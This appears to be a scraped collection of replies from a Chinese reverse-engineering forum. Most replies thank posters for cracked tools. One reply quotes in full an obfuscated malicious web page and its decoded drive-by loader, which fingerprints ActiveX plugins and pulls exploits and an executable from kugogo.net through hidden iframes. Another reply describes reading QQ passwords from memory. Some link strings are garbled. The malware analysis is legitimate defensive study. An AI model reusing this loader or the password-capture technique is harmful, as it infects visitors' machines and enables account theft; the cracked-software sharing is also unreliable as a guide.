[转帖]Hex-Rays.IDA.Professional.v6.1-UNiQUE
不错，不错。

[分享]刚才有牛人发微博说今天晚上有人发布IDA 6.1
感谢albeta提醒，其中一个地址又真的能下了。

[原创]2011过年礼物c32asm
好久不见,哈哈.

[十周年]“看雪十年 相伴你我”现场直播[照片]
这个不得不顶,原来TK也在论坛潜水,哈哈,我还以为只在XFOCUS呢.

[注意]淘宝网惊现钓鱼网站。直接穿透虚拟机系统
我在VM里的2003+IE7打开什么都没发现,我系统最近两月的补丁都没打,包括IE7的,基于缓冲区溢出保护的防火墙也没有报警,不知道楼主用的是什么虚拟机.还有具体配置怎样.

[原创]qq2008之前的视频解码---告别中关村之一
可以看看这里：
644K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0t1H3x3#2)9J5k6e0t1H3z5q4)9J5k6e0x3%4i4K6u0W2x3e0l9@1i4K6u0r3M7$3g2S2M7X3y4Z5i4K6y4r3M7g2)9K6c8r3y4S2j5$3S2W2i4K6y4m8P5e0m8A6x3U0m8J5h3e0N6s2e0X3N6v1i4K6y4m8j5X3u0K6i4K6u0W2M7r3g2V1K9i4W2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9r3!0%4N6r3S2J5k6h3q4V1i4K6u0W2M7r3S2H3i4K6t1#2x3@1k6@1i4K6t1#2x3@1b7%4x3e0l9I4y4g2)9J5b7Y4q4I4x3U0l9H3z5q4)9J5y4f1f1@1i4K6t1#2b7U0W2Q4x3U0f1^5b7W2)9J5y4f1f1#2i4K6t1#2z5o6W2Q4x3U0f1^5c8q4)9J5y4f1f1%4i4K6t1#2z5f1q4Q4x3U0f1^5y4q4)9J5y4f1f1^5i4K6t1#2b7e0N6Q4x3U0f1^5y4W2)9J5y4f1f1&6i4K6t1#2b7e0u0Q4x3U0f1&6x3g2)9J5y4f1f1^5i4K6t1#2b7e0N6Q4x3U0g2m8x3#2)9J5y4f1f1%4i4K6t1#2b7e0m8Q4x3U0f1^5x3g2)9J5y4X3S2D9i4K6y4p5P5X3S2Q4x3X3c8o6e0W2)9J5y4X3y4@1i4K6y4p5j5$3I4F1K9#2)9J5y4X3y4V1i4K6y4p5x3g2)9J5y4X3N6D9i4K6y4p5j5$3&6Q4x3U0k6K6N6q4)9#2k6Y4g2K6k6#2)9K6c8p5q4x3K9r3c8&6x3U0S2u0K9s2x3@1i4K6g2X3z5g2c8^5g2q4g2x3c8U0N6x3y4g2A6e0y4f1!0X3K9e0u0B7g2Y4c8S2b7b7`.`.

[原创]破解 WebInspect 7.7
国外还有些比较小的像Sandcat,Maui Security Scanner等，国内还有MatriXay小榕搞的吧，好像很贵，有个免费版跟你说的pangolin和啊D差不多。管中的我也试过，很傻瓜，不过自动化程度很高。

[下载]dUP 2.18 BETA 8
奇怪，diablo2oo2.di.funpic.de以前要用Proxy才可以访问啊，现在居然可以直接访问了，不过还是谢谢楼主的上传。

[原创]破解 WebInspect 7.7
scz大牛: N-Stalker可以找到Cracked版本啊，不过我觉得它还没有Acunetix的WVS好用，其实还有几个类似的，个人觉得都没有WebInspect好用。国产的也有几个，管中的那个还可以，比较方便，易语言写的，带狗。

[原创]暴风影音2008Beta1 最新远程溢出 0day 分析
这个一定得顶一下。

[求助]防不胜防啊，IE又有新漏洞？[Adobe Flash Player 9 .0.115严重安全漏洞]
刚刚大概看了下，有问题的页面是news.htm，base64编码。以下是news.htm的源文件：

<script>window.onerror=function(){return true;}</script>
<script>
/*Extreme*/
window.defaultStatus="完成";
Status="utf8to16";
function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
function base64decode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
function xxtea_decrypt(str,key){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v

=v

-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
t="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";
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0=4(5(3(0),\'\\2\\1\\6\\d\\7\'));c["\\b\\a\\8\\9"](0);',14,14,'t|x75|x66|base64decode|utf8to16|xxtea_decrypt|x63|x31|x61|x6c|x76|x65|window|x6b'.split('|'),0,{}))
/*Extreme*/
</script>

解页面，先把eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0=4(5(3(0),\'\\2\\1\\6\\d\\7\'));c["\\b\\a\\8\\9"](0);',14,14,'t|x75|x66|base64decode|utf8to16|xxtea_decrypt|x63|x31|x61|x6c|x76|x65|window|x6b'.split('|'),0,{}))

那段代码开始的eval改成alert得到：t=utf8to16(xxtea_decrypt(base64decode(t),'\x66\x75\x63\x6b\x31'));window["\x65\x76\x61\x6c"](t);

再执行一次alert(t=utf8to16(xxtea_decrypt(base64decode(t),'\x66\x75\x63\x6b\x31')));

最后看到：

try{var e;
var ado=(document.createElement("object"));
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/user1.kugogo.net\/ms06014.js><\/script>")}
else{
try{var f;
var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",");}
catch(f){};
finally{if(f!="[object Error]"){
if(Flashver[2] == 47){document.write('<embed src="http://user1.kugogo.net/flash1.swf"></embed>')}
if(Flashver[2] == 115){document.write('<embed src="http://user1.kugogo.net/flash2.swf"></embed>')}}}
try{var g;
var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src="http://user1.kugogo.net/GLWORLD.html"></iframe>')}}
try{var h;
var real=new ActiveXObject("IERPCtl.IERPCtl.1");}
catch(h){};
finally{if(h!="[object Error]"){
if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/user1.kugogo.net\/real.js><\/script>')}
else{document.write('<iframe style=display:none src="http://user1.kugogo.net/Real.html"></iframe>')}}}
try{var i;
var Baidu=new ActiveXObject("BaiduBar.Tool");}
catch(i){};
finally{if(i!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("faeK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4g2K6k6i4t1I4i4K6u0W2K9%4g2Y4L8$3N6G2i4K6u0W2L8X3g2@1i4K6u0r3b7X3q4A6k6s2g2Q4x3X3g2U0j5h3t1`.", "Baidu.exe", 0)}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]")
{
try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe width=100 height=0

src=419K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4g2K6k6i4t1I4i4K6u0W2K9%4g2Y4L8$3N6G2i4K6u0W2L8X3g2@1i4K6u0r3g2r3S2#2L8X3c8W2M7W2)9J5k6h3S2@1L8h3I4Q4x3U0k6Y4N6q4)9K6b7W2)9J5y4X3I4@1i4K6y4n7i4K6u0r3K9h3k6J5j5h3#2W2i4K6t1$3k6%4c8Q4x3@1u0Q4x3U0N6Q4x3U0W2Q4y4@1c8U0j5i4c8U0K9q4)9J5z5r3g2Q4x3U0W2Q4y4@1u0Q4y4@1b7`.
}}}

最后Whois一下kugogo.net的信息
   Updated Date: 28-may-2008
   Creation Date: 28-may-2008
   Expiration Date: 28-may-2009

汗，昨天才注册的，注册联系人的信息：
Registrant Contact:
   Gao
   Fei Gao (gaofei@163.com)
   +86.1012345678
   Fax: +86.1012345678
   Beijingtongcheng
   Beijing, Beijing 10000
   CN

ping user1.kugogo.net 得IP 121.10.105.109 广东省湛江市

先就这么多了，里面包含的几个网马懒得去分析了。

利用Debug Api 获得QQ2007密码
感谢forgot的指引，再参考了UnPacKcN的一篇文章，我调试了一下，发现确实是明文，特别是输入相同的字符作为密码的时候更容易观察，比如输入测试密码是$$$$$$，那么那段明文可能像这个样子：xfircvscxggbwkfnqduxwfnfoz$vsrtkjprepggxrpnrvystmwcys$yycqpevikeffmznimkkasvwsre$nzkycxfxtlsgypsfadpooefxzb$coejuvpvaboygpoeylfpbnpljv$rvipyamyehwqnqrqpmxujjloov$。每个密码字符中间插入了相同长度的垃圾，最后一位总是密码最后一位。

[新春礼物]《看雪论坛精华9》(2007.1.1-2007.12.31 )正式发布！
这个不得不支持一下，感谢发布。

骗到一份bestorm(商业FUZZER(漏洞挖掘机))，哪位壮士能crack之
唉，看你传的这么辛苦，其实试用版是可以申请的，只是要等几个小时才会回复邮件吧。

[推荐]DataRescue.IDA.Pro.Advanced.v5.2.-YAG(SDK+Hex-Rays.Decompiler.v1.0+相关补丁)
感谢shoooo大侠所做的努力和所有的人：P。

[HTTP下载]IDA.Pro.v5.1.0.899-YAG+SDK+补丁+标准资源汉化
这个是一定要支持的。

[分享]SoftWrap 6.x之一：制作内存补丁篇
0e4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4Z5k6h3#2S2P5q4)9J5k6i4u0#2i4K6u0r3N6r3!0G2L8s2x3K6i4K6u0W2M7r3S2H3

[原创]Aspr2.XX_unpacker_v1.0
感谢楼主分享成果,期待续集:)

[原创] Themida.demo.V1.8.0.0.CracKed.By.fly
fly真是热心:).原版是一个zip的压缩包,我是直接解压然后复制cr版本进去的,不知这有没有问题.我的系统是2003R2SP1.再次感谢楼主提供的帮助信息.